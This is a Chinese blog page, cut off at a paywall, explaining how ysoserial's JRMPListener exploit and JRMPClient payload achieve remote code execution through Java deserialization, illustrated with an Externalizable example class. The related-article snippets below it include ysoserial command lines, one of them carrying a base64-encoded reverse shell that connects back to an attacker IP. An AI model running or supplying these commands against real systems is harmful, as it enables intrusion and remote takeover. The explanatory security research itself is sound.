ysoserial exploit/JRMPListener原理剖析

最新推荐文章于 2024-11-14 20:04:04 发布
原创 最新推荐文章于 2024-11-14 20:04:04 发布 · 2.6k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入解析了ysoserialexploit/JRMPListener的工作原理,详细介绍了利用JRMPListener进行攻击的过程,包括如何生成payload,以及gadget链分析。文章还探讨了JRMPListener与JRMPClient的交互机制,揭示了命令执行的触发点。

ysoserial exploit/JRMPListener原理剖析

0 前言

上一篇文章讲了ysoserial exploit/JRMPClient的原理,本篇接着讲一下ysoserial exploit/JRMPListener的原理,相同的思路,我们结合着payloads/JRMPClient来分析。JRMPListener的攻击流程如下:
1、攻击方在自己的服务器使用exploit/JRMPListener开启一个rmi监听

2、往存在漏洞的服务器发送payloads/JRMPClient,payload中已经设置了攻击者服务器ip及JRMPListener监听的端口,漏洞服务器反序列化该payload后,会去连接攻击者开启的rmi监听,在通信过程中,攻击者服务器会发送一个可执行命令的payload(假如存在漏洞的服务器中有使用org.apacje.commons.collections包,则可以发送CommonsCollections系列的payload),从而达到命令执行的结果。

1 payloads/JRMPClient

1.1 Externalizable

在讲payloads/JRMPClient之前,我们先讲一下Externalizable,这是java提供的一个接口,实现该接口的类就具备了可序列化功能,下面总结一下它和Serializable接口的一些相同点与不同点:
1、实现Externalizable接口的类必须重写writeExternal(ObjectOutput out)和readExternal(ObjectInput in)两个方法,在这两个方法中可以自定义序列化和反序列化规则,而实现Serializable接口的类没有需要强制实现的方法。
2、假设类中有些敏感数据,我不希望在网络上传输该对象的序列化数据中包含该敏感数据,两种接口都可以实现:
(1)Externalizable接口,在实现writeExternal(ObjectOutput out)方法时,不对敏感数据进行序列化就可以
(2)Serializable接口,使用transient关键字修饰敏感字段,则该字段将不会被序列化。
对比一下,使用transient关键字修饰其实更方便。
3、两个各有特点,只能是根据不同的业务需求去选择使用。
下面我写了一个关于Externalizable的测试类,来进一步理解Externalizable:

public class Person implements Externalizable {
   
   

    private String username; //用户名
    private String password; //密码

    public String getUsername() {
   
   
        return username;
    }

    public void setUsername(String username) {
   
   
        this.username = username;
    }

    public String getPassword() {
   
   
        return password;
    }

    public void setPassword(String password) {
   
   
        this.password = password;
    }

    //在序列化Person对象时,只序列化username属性
    @Override
    public void writeExternal(ObjectOutput out) throws IOException {
   
   
        System.out.println("writeExternal is running ...");
        out.writeObject(username);
        out.close();
    }

    //反序列化Person对象时,只反序列化username属性
    @Override
    public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {
   
   
        this.username = (String)in.readObject();
        System.<
最低0.47元/天 解锁文章
ysoserial之JRMP源码分析(payloads.JRMPClient/exploit.JRMPListener)
weixin_45682070的博客
03-11 1536
前言 本来是想复现weblogicCVE-2017-3248漏洞的,这个漏洞使用了ysoserial的jrmp模块,开启rmi监听进行通信的,达到执行任意反序列化 payload。下文有些概念比较晦涩难懂,建议查阅其他资料配合使用。 JRMP协议是什么 JRMP全称为Java Remote Method Protocol,也就是Java远程方法协议。 一个RMI的过程,是用到JRMP这个协议去组织数据格式然后通过TCP进行传输,从而达到RMI,也就是远程方法调用。 JRMP是一个协议,是用于Java RMI
jrmp协议_ysoserial JRMP相关模块分析(二)- payloads/JRMPClient & exploit/JRMPListener
weixin_39876145的博客
12-24 818
简介payloads/JRMPClient 生存的 payload 是发送给目标机器的,exploit/JRMPListener 是在自己服务器上使用的,payloads/JRMPClient 的利用,离不开 exploit/JRMPListener ,反之 exploit/JRMPListener 的利用,在上篇文章中,它是可以独立使用的这篇文章是记录 payloads/JRMPClient 的...
Java反序列化漏洞
ovowovo的博客
12-10 1190
Ysoserial 介绍 Ysoserial是国外一款安全工具,集合了各种java反序列化payload,下载地址: https://github.com/frohoff/ysoserial/ 使用方法 1、首先使用ysoserial在攻击机上启动一个 JRMP server,输入以下命令 java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.j...
ysoserial exploit/JRMPClient原理剖析
hldfight
03-15 3227
0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是: 1、先往存在漏洞的服务器发送payloads/JRMPLIstener,使服务器反序列化该gadget后,会开启一个rmi服务并监听在设置的端口 2、然后攻击方在自己的服务器使用exploit/JRMPClient与存在漏洞的服务器...
Java反序列化之ysoserial URLDNS模块分析,用微课学java高级开发
m0_64867092的博客
12-20 665
URLStreamHandler handler = new SilentURLStreamHandler(); 创建了URLStreamHandler对象,该对象的作用,后面我们会详细说到。 接着: HashMap ht = new HashMap(); 创建了HashMap对象: URL u = new URL(null, “http://lyxhh.dnslog.cn”, handler); URL对象: ht.put(u, “http://lyxhh.dnslog.cn”); 将URL对象作为Has
ysoserial exploit/JRMPClient
洋洋的小黑屋
07-27 428
ysoserial exploit/JRMPClient 上一篇文章讲到,当服务器反序列化payloads/JRMPListener,即会开启端口监听。再使用exploit/JRMPClient模块发送payload,服务器就会把payload进行反序列化,从而完成进行攻击。 调用链分析 设置payloads/JRMPListener参数,端口号为1299,debug模式启动payloads/JRMPListener模块。 设置exploit/JRMPClient模块设置参数为127.0.0.1 1299
Exception in thread "main" java.lang.IllegalArgumentException: Invalid payload type 'CommonsCollections3' at ysoserial.payloads.ObjectPayload$Utils.makePayloadObject(ObjectPayload.java:62) at ysoserial.exploit.JRMPListener.main(JRMPListener.java:113) 什么意思
最新发布
08-28
java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections1 "command" ``` 注意:选择哪个payload取决于目标服务器上可用的库。如果目标服务器有commons-...
java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc5LjEzNS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" 执行不了哪里有问题
08-28
java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections3 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc5LjEzNS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}...
ysoserial.exploit.JRMPListener
2401_85480529的博客
11-14 1025
是工具中的一个模块,通常用于模拟。它主要用于配合 Java 反序列化漏洞的攻击,通过建立一个恶意的 RMI 服务端,来接收和执行反序列化的恶意对象。这在安全测试(尤其是针对 Java 应用的 RMI 反序列化攻击)中非常有用。
Yso-JRMPListener模块学习
why811的博客
08-30 340
ysoserial 中的会在指定端口开启一个 JRMP Server,其实现了对任意 RMI Client 的应答请求,会向任何连接其的客户端发送反序列化 payload。注意:区别这里的 JRMP Client 指的是发起 JRMP 请求的一方(下文以Client或者客户端称呼),既可能是 RMI Server,也可能是 RMI Client(两者都可以向 RMI Registry 发起 JRMP 请求)。
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
java 反序列化 ysoserial exploit/JRMPClient 原理剖析
whatday的专栏
06-26 3726
目录 0 前言 1payloads/JRMPListener 1.1 payload生成 1.2gadget链分析 2使用RMIRegistryExploit攻击上述开启的监听 3 exploit/JRMPClient 3.1分布式垃圾收集(DGC) 3.2exploit/JRMPClient代码分析 4 总结 0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是:...
java 反序列化 ysoserial exploit/JRMPListener 原理剖析
whatday的专栏
06-26 1875
目录 0 前言 1 payloads/JRMPClient 1.1 Externalizable 1.2 生成payload 1.3 gadget链分析 2 exploit/JRMPListener 3 总结 0 前言 上一篇文章讲了 《java 反序列化 ysoserial exploit/JRMPClient 原理剖析》 https://blog.csdn.net/whatday/article/details/106971531 ,本篇接着讲一下ysoserial expl.
基于ysoserial的深度利用研究(命令回显与内存马)
2401_84488651的博客
06-20 1428
很多小伙伴做反序列化漏洞的研究都是以命令执行为目标,本地测试最喜欢的就是弹计算器,但没有对反序列化漏洞进行深入研究,例如如何回显命令执行的结果,如何加载内存马。遇到了一个实际环境中的反序列化漏洞,也通过调试最终成功执行命令,达到了RCE的效果。在实际的攻防场景下,能执行命令并不是最完美的利用场景,内存马才是最终的目标。本篇文章就在此基础上讲一讲如何进行命令回显和加载内存马。
ysoserial代码分析-TemplatesImpl
GalaxySpaceX的博客
08-15 1209
ysoserial代码分析-TemplatesImpl
ysoserial.exploit.JRMPClassLoadingListener
2401_85480529的博客
11-14 829
是工具中的一个模块,用于攻击。这个模块的作用是创建一个恶意的 RMI 监听器,当目标服务器连接到该监听器时,强制目标系统加载攻击者控制的类文件,以执行恶意代码。
java反序列化工具ysoserial.jar浅析
qq_50854662的博客
02-13 932
java反序列化工具ysoserial.jar浅析
ysoserial.exploit.RMIRegistryExploit
2401_85480529的博客
11-14 1034
是工具中的一个模块,通常用于对进行攻击。其作用是向目标 RMI 注册表发送恶意序列化 payload,从而在目标服务器上执行任意代码。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值